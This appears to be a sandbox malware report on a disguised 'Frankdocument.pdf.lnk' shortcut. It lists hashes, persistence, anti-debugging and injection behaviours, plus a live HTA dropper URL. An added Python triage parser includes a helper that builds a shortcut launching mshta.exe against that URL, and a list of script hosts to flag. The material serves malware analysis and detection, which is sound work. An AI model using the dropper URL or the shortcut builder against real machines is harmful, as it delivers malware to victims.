Resubmissions

21/02/2024, 19:40   240221-ydhmtseg59   score 10/10

21/02/2024, 19:35   240221-yandxaeb5w   score 10/10

General

  • Target

    Frankdocument.pdf.lnk (a Windows shell link with a double extension; Explorer never displays the .lnk suffix, so the file shows up as Frankdocument.pdf)

  • Size

    2KB

  • Sample

    240221-ydhmtseg59

  • MD5

    7256cec0cc9a83bcfb4b21f6e8fbe331

  • SHA1

    b4309fb1e216685cffe17661708c1118127e1053

  • SHA256

    1ff0b2c5e3eec4f1da8dc0732a8eeca3b7989ee2a77b0f8c06eb6c31d8e4e5e6

  • SHA512

    26f5885d32b76c26243b8ea6590edc383407ac565f186d7a5c733e2b2198dd132eaa0dc84a073f84f6093d3ddad60cd873612d5514c91e3a42f883378d9d0cc3

Score
10/10

Malware Config

Extracted

  • Language

    hta

  • Source

    URLs

  • hta.dropper

    http://www.pdfexplorerplugin.com/q1

Targets

    • Target

      Frankdocument.pdf.lnk

    (size and hashes as listed under General above)

    Score
    10/10
    • Blocklisted process makes network request (compare the destination with the hta.dropper URL listed under Malware Config)

    • Adds Run key to start application (persistence via a ...\Software\Microsoft\Windows\CurrentVersion\Run value; check both HKCU and HKLM)

    • Suspicious use of NtCreateThreadExHideFromDebugger (thread created with THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER, so it never reports debug events: an anti-debugging technique)

    • Suspicious use of NtSetInformationThreadHideFromDebugger (ThreadHideFromDebugger applied to an existing thread; same anti-debugging effect)

    • Suspicious use of SetThreadContext (rewriting another thread's register state, typical of process hollowing or thread hijacking to run injected code)
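The report identifies the target as a double-extension shortcut and the extracted config as an HTA dropper URL; the first thing an analyst wants from a .lnk is what it actually launches. The following is an added example, not code from the report or the sandbox: a minimal MS-SHLLINK parser that pulls the relative path, working directory, arguments and ShowCommand out of a shortcut and flags the usual indicators (double extension, script-host target, embedded URL, hidden window). The sample shortcut it parses is constructed here; that the real file invokes mshta.exe with the hta.dropper URL is an assumption, as the page does not show the shortcut's contents.

```python
"""Added example: minimal MS-SHLLINK (.lnk) triage parser.
The sample shortcut built below is CONSTRUCTED for this example; the real
Frankdocument.pdf.lnk target and arguments are not on the report page."""
import re
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")

# LinkFlags (MS-SHLLINK 2.1.1) that say which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)
# Script hosts / LOLBins whose presence in a shortcut target is a strong red flag.
SCRIPT_HOSTS = ("mshta", "powershell", "pwsh", "cmd.exe", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil", "bitsadmin", "msiexec")


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of a shell link."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: HeaderSize must be 0x4C")
    if uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize includes itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for flag, name in STRING_FIELDS:         # fixed order, CountCharacters + chars, no NUL
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[name] = data[off:off + count].decode("cp1252")
            off += count
    return {"flags": flags, "show_command": show_command, **fields}


def build_lnk(relative_path: str, working_dir: str = "", arguments: str = "",
              show_command: int = 7) -> bytes:
    """Build a minimal Unicode shell link (no IDList/LinkInfo) as test input.
    show_command=7 is SW_SHOWMINNOACTIVE, which malicious shortcuts use to keep
    the launched window out of sight."""
    strings = [(HAS_RELATIVE_PATH, relative_path), (HAS_WORKING_DIR, working_dir),
               (HAS_ARGUMENTS, arguments)]
    flags = IS_UNICODE
    for flag, value in strings:
        if value:
            flags |= flag
    header = struct.pack("<I", 0x4C) + LNK_CLSID.bytes_le + struct.pack("<I", flags)
    header += struct.pack("<I", 0x20)        # FileAttributes: FILE_ATTRIBUTE_ARCHIVE
    header += b"\x00" * 24                   # Creation/Access/Write FILETIMEs
    # FileSize, IconIndex, ShowCommand, HotKey, Reserved1, Reserved2, Reserved3
    header += struct.pack("<IIIHHII", 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(v)) + v.encode("utf-16-le")
                    for _, v in strings if v)
    return header + body + struct.pack("<I", 0)   # TerminalBlock closes ExtraData


def triage_lnk(filename: str, data: bytes) -> dict:
    """Parse a shortcut and list the indicators an analyst checks first."""
    info = parse_lnk(data)
    findings = []
    base = filename.lower()
    if base.endswith(".lnk") and "." in base[:-4]:
        # .lnk is registered NeverShowExt, so Explorer displays only the inner name.
        findings.append("double extension, displayed as %s" % filename[:-4])
    launch = " ".join(info.get(k, "") for k in ("relative_path", "arguments"))
    for host in SCRIPT_HOSTS:
        if host in launch.lower():
            findings.append("target invokes script host %s" % host)
    urls = re.findall(r"https?://[^\s\"']+", launch)
    if urls:
        findings.append("remote payload URL in arguments")
    if info["show_command"] == 7:
        findings.append("ShowCommand SW_SHOWMINNOACTIVE (hidden window)")
    return {"target": info.get("relative_path", ""), "arguments": info.get("arguments", ""),
            "urls": urls, "findings": findings}


# Constructed stand-in for the sample: ASSUMED to launch mshta.exe against the
# hta.dropper URL from the report's Malware Config; not the real file's contents.
SAMPLE_NAME = "Frankdocument.pdf.lnk"
SAMPLE_LNK = build_lnk(r"..\..\Windows\System32\mshta.exe", r"C:\Windows\System32",
                       "http://www.pdfexplorerplugin.com/q1")

if __name__ == "__main__":
    result = triage_lnk(SAMPLE_NAME, SAMPLE_LNK)
    print(result["target"], result["arguments"])
    for finding in result["findings"]:
        print(" -", finding)
```

The parser only reads the header and StringData and skips the IDList and LinkInfo by their size fields, which is enough to see the launch command; real samples sometimes pad the arguments with thousands of spaces or put the payload in the IDList or ExtraData instead, so when the arguments look empty, dump the rest of the file before concluding the shortcut is benign.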

MITRE ATT&CK Enterprise v15

Tasks